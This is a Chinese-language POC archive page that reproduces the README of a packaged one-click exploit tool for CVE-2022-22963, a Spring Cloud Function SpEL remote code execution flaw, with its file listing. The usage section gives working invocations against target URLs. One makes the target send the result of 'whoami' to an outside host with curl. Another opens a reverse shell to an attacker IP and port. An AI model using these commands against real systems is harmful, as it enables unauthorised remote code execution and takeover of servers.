关联漏洞
描述
spring cloud function 一键利用工具! by charis 博客https://charis3306.top/
介绍
# CVE-2022-22963 (spring cloud function sple rce)
### spring cloud function 一键利用工具! by charis
#### 博客https://charis3306.top/
##### 已打包为exe文件开箱即用
#### 命令主题
```
usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]
spring cloud function 一键利用工具! by charis 博客https://charis3306.top/
options:
-h, --help show this help message and exit
--check CHECK 检测方式post或get方式,--check get --check post
--route ROUTE 检测路由,默认是functionRouter
--url URL 输入利用的url
--ip IP 反弹shell地址ip
--port PORT 反弹shell地址端口
--proxies PROXIES 启用代理
--cmd CMD 要执行的命令
```
--check 是必选项
#### 所用帮助主题
```
Spring-cloud-function-spel0.2.exe --help
```

> 默认检测--check 是必须选,--route是漏洞存在的路由。
注意如果不借助dnslog 或sleep 进行探测会存有误报!
```
Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top
```

##### 执行命令验证是否能利用
```
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --cmd "curl http://192.168.1.3:8080/`whoami`"
```

##### 反弹shell
```
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --ip 192.168.1.3 --port 9999
```

#### 如果你觉得还不错请给我一个star
#### 问题反馈lssues 或邮箱联系我charis3306@outlook.com
文件快照
[4.0K] /data/pocs/f5ba8dc7fdff14946ed60c22c44ac595156af49f
├── [ 55K] 1.png
├── [ 35K] 2.png
├── [117K] 3.png
├── [ 78K] 4.png
├── [1.8K] README.md
├── [5.2K] Spring-cloud-function-spel.py
└── [6.4K] spring.ico
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。